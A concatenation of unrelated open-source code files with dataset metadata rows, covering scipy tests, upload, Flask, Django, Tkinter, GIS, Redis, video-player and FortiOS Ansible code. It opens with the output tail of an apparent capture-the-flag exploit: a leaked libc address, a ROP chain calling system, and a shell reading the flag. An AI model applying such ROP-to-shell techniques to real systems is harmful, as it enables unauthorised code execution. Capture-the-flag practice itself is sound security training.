# [+] libc address: 0x7efc0b62a000
# [*] Loaded cached gadgets for './libc-amd64-2.23-0ubuntu9.so'
# 0x0000: 0x7efc0b64b102 pop rdi; ret
# 0x0008: 0x7efc0b7b6d17
# 0x0010: 0x7efc0b66f390 system
# 0x0018: 'gaaahaaa' <pad>
# [*] Switching to interactive mode
# $ ls
# flag
# zone
# $ cat flag
# flag{d0n7_let_m3_g3t_1n_my_z0n3}
|
mit
| 7,253,582,822,140,688,000
| 30.921053
| 108
| 0.663094
| false
| 2.663982
| false
| false
| false
|
apbard/scipy
|
scipy/constants/tests/test_constants.py
|
2
|
3115
|
from __future__ import division, print_function, absolute_import
from numpy.testing import assert_equal, assert_allclose
from scipy._lib._numpy_compat import suppress_warnings
import scipy.constants as sc
def test_convert_temperature():
assert_equal(sc.convert_temperature(32, 'f', 'Celsius'), 0)
assert_equal(sc.convert_temperature([0, 0], 'celsius', 'Kelvin'),
[273.15, 273.15])
assert_equal(sc.convert_temperature([0, 0], 'kelvin', 'c'),
[-273.15, -273.15])
assert_equal(sc.convert_temperature([32, 32], 'f', 'k'), [273.15, 273.15])
assert_equal(sc.convert_temperature([273.15, 273.15], 'kelvin', 'F'),
[32, 32])
assert_equal(sc.convert_temperature([0, 0], 'C', 'fahrenheit'), [32, 32])
assert_allclose(sc.convert_temperature([0, 0], 'c', 'r'), [491.67, 491.67],
rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'Rankine', 'C'),
[0., 0.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'r', 'F'),
[32., 32.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([32, 32], 'fahrenheit', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([273.15, 273.15], 'K', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 0.], 'rankine', 'kelvin'),
[273.15, 0.], rtol=0., atol=1e-13)
def test_fahrenheit_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
assert_equal(sc.F2C(32), 0)
assert_equal(sc.F2C([32, 32]), [0, 0])
def test_celsius_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.C2K([0, 0]), [273.15, 273.15])
def test_kelvin_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
assert_equal(sc.K2C([0, 0]), [-273.15, -273.15])
def test_fahrenheit_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2K` is deprecated!")
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.F2K([32, 32]), [273.15, 273.15])
def test_kelvin_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2F` is deprecated!")
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.K2F([273.15, 273.15]), [32, 32])
def test_celsius_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.C2F([0, 0]), [32, 32])
def test_lambda_to_nu():
assert_equal(sc.lambda2nu(sc.speed_of_light), 1)
def test_nu_to_lambda():
assert_equal(sc.nu2lambda(1), sc.speed_of_light)
|
bsd-3-clause
| 973,531,989,903,674,900
| 38.43038
| 79
| 0.608026
| false
| 3.000963
| true
| false
| false
|
longaccess/longaccess-client
|
lacli/upload.py
|
1
|
8840
|
from lacli.exceptions import PauseEvent
from lacli.pool import MPUpload
from lacli.source.chunked import ChunkedFile
from lacore.storage.s3 import MPConnection
from lacore.api import UploadState as BaseUploadState
from contextlib import contextmanager
from lacli.log import getLogger
from lacli.progress import queueHandler
from lacli.control import ControlHandler
from lacli.worker import WorkerPool
from lacore.async import block
from twisted.internet import defer, threads
from itertools import count
from multiprocessing import TimeoutError
from multiprocessing import get_logger as mp_logging_init
import errno
import signal
class LogHandler(queueHandler):
def __init__(self, logger='lacli'):
self.logger = getLogger(logger)
def handle(self, msg):
self.logger.handle(msg)
class UploadState(BaseUploadState):
states = None
@classmethod
def has_state(cls, fname):
if cls.states is None:
cls.setup()
if fname in cls.states:
return True
return False
@classmethod
def init(cls, cache):
cls.cache = cache
@classmethod
def setup(cls):
uploads = cls.cache._get_uploads()
a = cls.cache._for_adf('archives')
sz = lambda f: a[f]['archive'].meta.size
cls.states = {k: cls(k, sz(k), **v)
for k, v in uploads.iteritems()
if k in a}
@classmethod
def get(cls, fname, size=None, capsule=None, sandbox=False):
if cls.states is None:
cls.setup()
if fname in cls.states:
state = cls.states[fname]
msg = "Can't change {} for upload"
if size is not None:
assert state.size == size, msg.format('size')
cls.states[fname].size = size
if capsule is not None:
# might be helpful if you want to change the capsule
if state.capsule is None:
state.capsule = capsule
cid = state.capsule.get('id', None)
assert cid == capsule['id'], msg.format('capsule')
cls.states[fname].capsule = capsule
if sandbox is True:
assert state.sandbox == sandbox, msg.format('sandbox status')
cls.states[fname].sandbox = True
return cls.states[fname]
cls.states[fname] = UploadState(fname, size, capsule=capsule,
sandbox=sandbox)
return cls.states[fname]
@classmethod
def reset(cls, fname):
if cls.states is None:
cls.setup()
if fname not in cls.states:
raise ValueError("Upload doesn't exist!")
cls.cache._del_upload(fname)
return cls.states.pop(fname)
def __init__(self, archive, size, keys=[],
exc=None, paused=True, **kwargs):
super(UploadState, self).__init__(archive, size, **kwargs)
self.cache = type(self).cache
self.logfile = self.control = None
self.keys = keys
self.progress = reduce(lambda x, y: x + y['size'], self.keys, 0)
self.pausing = False
self._paused = paused
self.exc = exc
self.deferred_upload = None
def __enter__(self):
try:
self.exc = None
self.control = ControlHandler()
self.logfile = self.cache._upload_open(self.archive, mode='r+')
getLogger().debug("Found state file for %s", self.archive)
except IOError as e:
if e.errno == errno.ENOENT:
getLogger().debug("Creating state file for %s", self.archive)
self.logfile = self.cache._upload_open(self.archive, mode='w+')
else:
raise e
# update keys from file
upload = self.cache._validate_upload(self.logfile)
self.uri = upload.get('uri', self.uri)
self.keys = upload.get('keys', self.keys)
if self._paused is True:
self._paused = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
return self
@block
@defer.inlineCallbacks
def wait_for_upload(self):
try:
result = yield self.deferred_upload
defer.returnValue(result)
except PauseEvent:
pass
if self.pausing is True:
self.paused()
def __exit__(self, type, value, traceback):
if type is not None:
if type == PauseEvent:
getLogger().debug("upload paused.")
self.paused()
else:
getLogger().debug("error in upload", exc_info=True)
self.error(value)
if self.logfile is not None:
self.logfile.close()
self.logfile = self.control = None
return type is None
def keydone(self, key, size):
assert self.logfile is not None, "Log not open"
self.keys.append(
self.cache._checkpoint_upload(key, size, self.logfile))
def update(self, progress):
self.progress = progress
@property
def seq(self):
return len(self.keys)
def pause(self):
if not self.pausing and self.control is not None:
self.control.pause()
self.pausing = True
def paused(self):
getLogger().debug("upload state paused")
if self.exc is not None:
getLogger().debug("can't pause a failed upload")
return
self._paused = True
if self.pausing is True:
self.pausing = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
def active(self):
return self._paused is False and self.exc is None
def signal(self, sig, frame):
getLogger().debug("Got interrupt")
if sig == signal.SIGINT:
getLogger().debug("Pausing")
if self.pausing is True:
raise SystemExit("Interrupted")
self.pausing = True
self.control.pause()
def save_op(self, op):
assert self.uri is None, "Can't change URI for upload state"
if op.uri is None:
return
self.cache._write_upload(op.uri, self.capsule, self.logfile,
self.exc, self._paused)
self.uri = op.uri
def error(self, exc):
if self.exc is None:
self.cache._write_upload(self.uri, self.capsule,
self.logfile, str(exc), self._paused)
self.exc = exc
class Upload(object):
def __init__(self, session, nprocs, debug, state):
self.prefs = {
'nprocs': nprocs,
'debugworker': debug > 2
}
self.log = LogHandler()
self.state = state
@contextmanager
def _workers(self, progq):
with self.log as logq:
with self.state.control as ctrlq:
mp_logging_init()
pool = WorkerPool(
self.prefs, logq, progq, ctrlq)
try:
yield pool
finally:
getLogger().debug("terminating pool")
pool.terminate()
pool.join()
def upload_temp(self, token, source, etags, pool, seq):
key = "temp-archive-{seq}".format(seq=seq)
connection = MPConnection(**token)
with MPUpload(connection, source, key) as uploader:
etags[key], source = uploader.get_result(
uploader.submit_job(pool))
return source
@defer.inlineCallbacks
def upload(self, fname, upload, progq):
with self._workers(progq) as pool:
etags = {}
source = ChunkedFile(fname, self.state.progress)
token = yield upload.status
for seq in count(start=self.state.seq):
try:
source = yield threads.deferToThread(
self.upload_temp, token, source, etags, pool, seq)
except PauseEvent:
getLogger().debug(
"paused after uploading %d temporary keys", seq)
raise
except TimeoutError:
getLogger().debug(
"timeout after uploading %d temporary keys", seq)
token = yield upload.status
if source is None:
getLogger().debug("uploaded entire archive")
break
getLogger().debug("uploaded %d temp keys", len(etags))
for key, tag in etags.iteritems():
getLogger().debug("key: %s (etag: %s)", key, tag)
# vim: et:sw=4:ts=4
|
apache-2.0
| 7,196,664,246,178,638,000
| 33.131274
| 79
| 0.552262
| false
| 4.337586
| false
| false
| false
|
MukunthanAlagarsamy/UCC_attempt1
|
app.py
|
1
|
1772
|
#!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
if req.get("result").get("action") == "shipping.cost":
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
if req.get("result").get("action") == "product.identification":
# result = req.get("result")
# parameters = result.get("parameters")
# zone = parameters.get("producttype")
# cost = {'TV':100, 'Mobile':"Whats the problem with your Mobile", 'Bank':'Whats the problem with your Bank'}
speech = "Thank u"
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
#"data": {},
# "contextOut": [],
"source": "apiai-onlinestore-shipping"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print "Starting app on port %d" % port
app.run(debug=True, port=port, host='0.0.0.0')
|
apache-2.0
| 590,739,204,705,281,700
| 25.447761
| 116
| 0.597065
| false
| 3.508911
| false
| false
| false
|
ProstoKSI/django-weed
|
djweed/db_fields.py
|
1
|
2767
|
from django.contrib.contenttypes.models import ContentType
try:
from django.core.urlresolvers import reverse
except ImportError: # Django 2.0
from django.urls import reverse
from django.db.models.fields.files import FieldFile, FileField
from django.utils import six
from .storage import WeedFSStorage
class WeedFSFieldFile(FieldFile):
def _split_name(self):
splitted_name = self.name.split(':', 1)
if len(splitted_name) == 2:
return splitted_name
return splitted_name[0], ''
def _get_storage_fid(self):
return self._split_name()[0]
storage_fid = property(_get_storage_fid)
def _get_verbose_name(self):
return self._split_name()[1]
verbose_name = property(_get_verbose_name)
def _get_content(self):
self._require_file()
return self.storage.content(self.storage_fid)
content = property(_get_content)
def _get_url(self):
self._require_file()
content_type = ContentType.objects.get_for_model(self.instance._meta.model)
return reverse('weedfs_get_file', kwargs={
'content_type_id': content_type.id,
'object_id': self.instance.id,
'field_name': self.field.name,
'file_name': self.verbose_name,
})
url = property(_get_url)
def _get_storage_url(self):
self._require_file()
return self.storage.url(self.storage_fid)
storage_url = property(_get_storage_url)
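# Illustrative note (assumption, not stated in the original code): the field
# value is stored as "<fid>:<verbose name>", e.g. "3,01637037d6:report.pdf";
# _split_name() then yields the SeaweedFS fid ("3,01637037d6") used for
# storage lookups and the human-readable name ("report.pdf") used in URLs.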
class WeedFSFileField(FileField):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = WeedFSFieldFile
def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
kwargs.pop('upload_to', None)
storage = kwargs.pop('storage', None)
if storage is None:
storage = WeedFSStorage()
super(WeedFSFileField, self).__init__(verbose_name, name,
storage=storage, **kwargs)
def get_prep_value(self, value):
"Returns field's value prepared for saving into a database."
# Need to convert File objects provided via a form to unicode for database insertion
if value is None:
return None
if isinstance(value, six.string_types):
return six.text_type(value)
if value.name == '':
return ''
if isinstance(value, WeedFSFieldFile):
return value.name
return self.storage.save(None, value)
def south_field_triple(self):
from south.modelsinspector import introspector
field_class = "django.db.models.fields.CharField"
args, kwargs = introspector(self)
return (field_class, args, kwargs)
|
mit
| 4,202,618,077,747,209,000
| 32.743902
| 92
| 0.641128
| false
| 3.924823
| false
| false
| false
|
COCS4950G7/COSC4950
|
Resources/Tkinter Examples/Tkinter_example.py
|
1
|
1256
|
#import Tkinter
#l = Tkinter.Label(text = "***************************See me?*************************")
#l.pack()
#l.mainloop()
#print("Howdy")
#omfg
#print("dostuff")
# http://www.ferg.org/thinking_in_tkinter/all_programs.html
from Tkinter import *
class MyApp:
def __init__(self, parent):
self.myParent = parent ### (7) remember my parent, the root
self.myContainer1 = Frame(parent)
self.myContainer1.pack()
self.button1 = Button(self.myContainer1)
self.button1.configure(text="OK", background= "green")
self.button1.pack(side=LEFT)
self.button1.bind("<Button-1>", self.button1Click) ### (1)
self.button2 = Button(self.myContainer1)
self.button2.configure(text="Cancel", background="red")
self.button2.pack(side=RIGHT)
self.button2.bind("<Button-1>", self.button2Click) ### (2)
def button1Click(self, event): ### (3)
if self.button1["background"] == "green": ### (4)
self.button1["background"] = "yellow"
else:
self.button1["background"] = "green"
def button2Click(self, event): ### (5)
self.myParent.destroy() ### (6)
root = Tk()
myapp = MyApp(root)
root.mainloop()
|
gpl-3.0
| 5,148,761,549,873,680,000
| 19.95
| 88
| 0.57086
| false
| 3.305263
| false
| false
| false
|
barthoekstra/Orographic-Landscape-Navigator
|
gisactions.py
|
1
|
1466
|
#!/usr/bin/python
# This code is simply a wrapper for running gdal commands, without MATLAB
# causing issues with dependencies, etc.
import sys
import os
print(sys.argv[0])
action = sys.argv[1]
targetfile = sys.argv[2]
if action == "merge":
    print('Merging...')
# gdalbuildvrt merged.vrt r14bn2.wgs84.tif r14en1.wgs84.tif r14ez1.wgs84.tif r14bz2.wgs84.tif r14bz1.wgs84.tif r14bn1.wgs84.tif r09dz1.wgs84.tif r09dz2.wgs84.tif r09gz1.wgs84.tif
# gdalbuildvrt output.vrt files-to-be-merged.tif separated-by-spaces.tif
# python gisactions.py merge data/dem/output.vrt data/dem/r14bn2.wgs84.tif data/dem/r14bn1.wgs84.tif
# First create a virtual mosaic
# Cmd format: gdalbuildvrt output.vrt file1.tif file2.tif file3.tif
print('Creating mosaic...')
targetvrt = targetfile.replace(".tif", ".vrt")
cmd_mosaic = "gdalbuildvrt %s %s" % (targetvrt, ' '.join(sys.argv[3:]))
os.system(cmd_mosaic)
# Now translate the mosaic to an actual GeoTiff
# Cmd format: gdal_translate -of GTiff mosaic.vrt output.tif
mergedfile = sys.argv[2].replace(".wgs84.tif", ".merged.wgs84.vrt")
cmd_merge = "gdal_translate -a_srs \"+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs\" -of GTiff %s %s" % (targetvrt, targetfile)
os.system(cmd_merge)
# Now remove the .vrt
os.remove(targetvrt)
print('Merge finished...')
elif action == "reproject":
print('Reprojecting...')
else:
print('No valid action provided.')
|
gpl-3.0
| -5,237,369,659,882,149,000
| 35.65
| 182
| 0.697817
| false
| 2.745318
| false
| false
| false
|
MaxTyutyunnikov/lino
|
obsolete/src/lino/apps/pizzeria/services.py
|
1
|
2711
|
## Copyright 2003-2007 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify it
## under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful, but WITHOUT
## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
## or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
## License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, write to the Free Software Foundation,
## Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from lino.adamo.ddl import *
from lino.adamo.datatypes import itod
from lino.apps.pizzeria import pizzeria
#from lino.apps.pizzeria.pizzeria import Orders, Products, OrderLines, Customers
class Service(pizzeria.Product):
tableName="Services"
def initTable(self,table):
pizzeria.Product.initTable(self,table)
table.addField('responsible',STRING)
class ServicesReport(DataReport):
leadTable=Service
class MyPizzeriaSchema(pizzeria.PizzeriaSchema):
tableClasses = (pizzeria.Product,
Service,
pizzeria.Customer,
pizzeria.Order, pizzeria.OrderLine)
class MyPizzeriaMain(pizzeria.PizzeriaMain):
schemaClass=MyPizzeriaSchema
"""
Welcome to MyPizzeria, a customization of the most simple Lino demo
application. Note that this application is for demonstration purposes
only.
"""
def setupMenu(self):
m = self.addMenu("my","&My Pizzeria")
self.addReportItem(
m,"services",ServicesReport,label="&Services")
pizzeria.PizzeriaMain.setupMenu(self)
class MyPizzeria(pizzeria.Pizzeria):
name="My Pizzeria"
mainFormClass=MyPizzeriaMain
def populate(dbc):
pizzeria.populate(dbc)
SERV = dbc.query(Service)
CUST = dbc.query(pizzeria.Customer)
ORDERS = dbc.query(pizzeria.Order)
PROD = dbc.query(pizzeria.Product)
s1 = SERV.appendRow(name="bring home",price=1)
s2 = SERV.appendRow(name="organize party",price=100)
c3 = CUST.appendRow(name="Bernard")
o1 = ORDERS.appendRow(customer=c3,date=itod(20040318))
q = o1.lines()
q.appendRow(product=PROD.peek(1),qty=1)
q.appendRow(product=s1,qty=1)
o2 = ORDERS.appendRow(customer=CUST.peek(1),date=itod(20040319))
q = o2.lines()
q.appendRow(product=PROD.peek(1),qty=2)
q.appendRow(product=PROD.peek(2),qty=3)
o1.register()
o2.register()
|
gpl-3.0
| 4,601,415,181,698,994,000
| 27.536842
| 80
| 0.694947
| false
| 3.242823
| false
| false
| false
|
cwoebker/relo
|
relo/core/backend/redisdb.py
|
1
|
1633
|
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
import redis
from relo.core.log import logger
dirname = os.path.dirname(os.path.abspath(__file__))
up_dir = os.path.dirname(dirname)
sys.path.append(up_dir)
from relo.core.interfaces import Backend
class REDISDB(Backend):
name = "redis"
expiretime = 60*60*24*7 # for a week
def init(self):
logger.debug("Connecting to Redis")
self.connection = redis.StrictRedis(host='localhost', port=6379, db=12)
def check(self):
logger.debug("check not needed with redis")
def load(self):
logger.debug("Redis auto loads")
def save(self):
self.connection.save()
def addProject(self, key, project, type):
project_string = project + ":::" + type
self.connection.sadd(key, project_string)
def listProjects(self, key):
members = self.connection.smembers(key)
returnList = []
for member in members:
returnList.append(member.split(":::"))
return returnList
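    # Illustrative note (assumption): projects are stored in a Redis set as
    # "<project>:::<type>" strings, e.g. "~/code/myproj:::git", which
    # listProjects() splits back into [project, type] pairs.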
def addMeta(self, path, modified, hash, size, type):
pipe = self.connection.pipeline()
pipe.hmset(path, dict(modified=modified, hash=hash, size=size, type=type)).expire(path, self.expiretime).execute()
del pipe
def addSet(self, key, value):
self.connection.sadd(key, value)
def getSet(self, key):
return self.connection.smembers(key)
def get(self, key, field):
return self.connection.hget(key, field)
def find(self, key):
return self.connection.keys(pattern='*'+key+'*')
def end(self):
self.connection.shutdown()
|
bsd-3-clause
| -2,834,990,471,099,505,700
| 32.346939
| 122
| 0.644213
| false
| 3.589011
| false
| false
| false
|
KanoComputing/kano-video
|
kano_video/logic/player.py
|
1
|
4469
|
# player.py
#
# Copyright (C) 2014-2016 Kano Computing Ltd.
# License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPL v2
#
# Manages playing of videos
import sys
import os
from kano.utils import is_installed, run_bg, get_volume, percent_to_millibel
from kano.logging import logger
from .youtube import get_video_file_url
# Support for Gtk versions 3 and 2
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import playudev
subtitles_dir = '/usr/share/kano-media/videos/subtitles'
omxplayer_present = is_installed('omxplayer')
vlc_present = is_installed('vlc')
if not omxplayer_present and not vlc_present:
sys.exit('Neither vlc nor omxplayer is installed!')
def play_video(_button=None, video_url=None, localfile=None, subtitles=None,
init_threads=True, keyboard_engulfer=True):
"""
Plays a local or remote video using the optimal video player found.
Handles sound settings and subtitles.
"""
if video_url:
logger.info('Getting video url: {}'.format(video_url))
success, data = get_video_file_url(video_url)
if not success:
logger.error('Error with getting YouTube url: {}'.format(data))
if _button:
_button.set_sensitive(True)
return
link = data
elif localfile:
link = localfile
else:
if _button:
_button.set_sensitive(True)
return
logger.info('Launching player...')
if omxplayer_present:
volume_percent = get_volume()
volume_str = '--vol {}'.format(
percent_to_millibel(volume_percent, raspberry_mod=True))
if not subtitles or not os.path.isfile(subtitles):
subtitles = None
if localfile:
filename = os.path.basename(localfile)
filename = os.path.splitext(filename)[0]
fullpath = os.path.join(subtitles_dir, filename + '.srt')
if os.path.exists(fullpath):
subtitles = fullpath
if not subtitles:
subtitles = os.path.join(subtitles_dir, 'controls.srt')
subtitles_str = ''
try:
from kano_settings.system.display import is_overscan
if not is_overscan():
subtitles_str = '--subtitle "{subtitles}" ' \
'--font "/usr/share/fonts/kano/bariol/Bariol_Regular.otf" --font-size 35 ' \
'--align center'.format(subtitles=subtitles)
except Exception:
pass
        # Select the audio output: HDMI or analogue jack. Default is HDMI since it is the
        # safest route, given that the PiHat lib can get destabilised if the jack is used.
audio_out = 'hdmi'
try:
from kano_settings.system.audio import is_HDMI
if not is_HDMI():
audio_out = 'local'
except Exception:
pass
player_cmd = 'omxplayer -o {audio_out} {volume_str} {subtitles} -b "{link}"' \
''.format(
audio_out=audio_out,
link=link,
volume_str=volume_str,
subtitles=subtitles_str
)
else:
player_cmd = 'vlc -f --no-video-title-show ' \
'"{link}"'.format(link=link)
# Play with keyboard interaction coming from udev directly
# so that we do not lose focus and capture all key presses
playudev.run_player(player_cmd, init_threads=init_threads,
keyboard_engulfer=keyboard_engulfer)
# finally, enable the button back again
if _button:
_button.set_sensitive(True)
def get_centred_coords(width, height):
"""
Calculates the top-left and bottom-right coordinates for a given window
size to be centred
"""
from gi.repository import Gdk
taskbar_height = 44
monitor = {
'width': Gdk.Screen.width(),
'height': Gdk.Screen.height(),
}
x1 = (monitor['width'] - width) / 2
x2 = x1 + width
y1 = ((monitor['height'] - taskbar_height) - height) / 2
y2 = y1 + height
return x1, y1, x2, y2
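# Worked example (illustrative numbers only): on a 1920x1080 screen with the
# 44px taskbar, an 800x600 window gets x1=560, y1=218, x2=1360, y2=818.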
def stop_videos(_button=None):
"""
Kills all videos that are currently playing
# TODO: Stop only videos which are managed by this module
"""
if omxplayer_present:
run_bg('killall omxplayer.bin')
else:
run_bg('killall vlc')
|
gpl-2.0
| 4,278,216,597,469,036,500
| 28.596026
| 96
| 0.590065
| false
| 3.872617
| false
| false
| false
|
amenonsen/ansible
|
lib/ansible/modules/network/fortios/fortios_firewall_DoS_policy6.py
|
1
|
16272
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_DoS_policy6
short_description: Configure IPv6 DoS policies in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS device by allowing the
user to set and modify firewall feature and DoS_policy6 category.
      Examples include all parameters and values which need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
state:
description:
- Indicates whether to create or remove the object.
type: str
choices:
- present
- absent
version_added: 2.9
firewall_DoS_policy6:
description:
- Configure IPv6 DoS policies.
default: null
type: dict
suboptions:
anomaly:
description:
- Anomaly name.
type: list
suboptions:
action:
description:
- Action taken when the threshold is reached.
type: str
choices:
- pass
- block
log:
description:
- Enable/disable anomaly logging.
type: str
choices:
- enable
- disable
name:
description:
- Anomaly name.
required: true
type: str
quarantine:
description:
- Quarantine method.
type: str
choices:
- none
- attacker
quarantine_expiry:
description:
- Duration of quarantine. (Format ###d##h##m, minimum 1m, maximum 364d23h59m, default = 5m). Requires quarantine set to attacker.
type: str
quarantine_log:
description:
- Enable/disable quarantine logging.
type: str
choices:
- disable
- enable
status:
description:
- Enable/disable this anomaly.
type: str
choices:
- disable
- enable
threshold:
description:
- Anomaly threshold. Number of detected instances per minute that triggers the anomaly action.
type: int
threshold(default):
description:
- Number of detected instances per minute which triggers action (1 - 2147483647, default = 1000). Note that each anomaly has a
different threshold value assigned to it.
type: int
comments:
description:
- Comment.
type: str
dstaddr:
description:
- Destination address name from available addresses.
type: list
suboptions:
name:
description:
- Address name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
interface:
description:
- Incoming interface name from available interfaces. Source system.zone.name system.interface.name.
type: str
policyid:
description:
- Policy ID.
required: true
type: int
service:
description:
- Service object from available options.
type: list
suboptions:
name:
description:
- Service name. Source firewall.service.custom.name firewall.service.group.name.
required: true
type: str
srcaddr:
description:
- Source address name from available addresses.
type: list
suboptions:
name:
description:
                            - Address name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
status:
description:
- Enable/disable this policy.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure IPv6 DoS policies.
fortios_firewall_DoS_policy6:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
firewall_DoS_policy6:
anomaly:
-
action: "pass"
log: "enable"
name: "default_name_6"
quarantine: "none"
quarantine_expiry: "<your_own_value>"
quarantine_log: "disable"
status: "disable"
threshold: "11"
threshold(default): "12"
comments: "<your_own_value>"
dstaddr:
-
name: "default_name_15 (source firewall.address6.name firewall.addrgrp6.name)"
interface: "<your_own_value> (source system.zone.name system.interface.name)"
policyid: "17"
service:
-
name: "default_name_19 (source firewall.service.custom.name firewall.service.group.name)"
srcaddr:
-
name: "default_name_21 (source firewall.address6.name firewall.addrgrp6.name)"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_firewall_DoS_policy6_data(json):
option_list = ['anomaly', 'comments', 'dstaddr',
'interface', 'policyid', 'service',
'srcaddr', 'status']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
        for i, elem in enumerate(data):
            data[i] = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
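# Illustration (hypothetical input, not taken from the module): passing
# {'quarantine_expiry': '5m', 'dstaddr': [{'name': 'all'}]} through
# underscore_to_hyphen yields {'quarantine-expiry': '5m', 'dstaddr': [{'name': 'all'}]},
# matching the hyphenated field names expected by the FortiOS REST API.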
def firewall_DoS_policy6(data, fos):
vdom = data['vdom']
state = data['state']
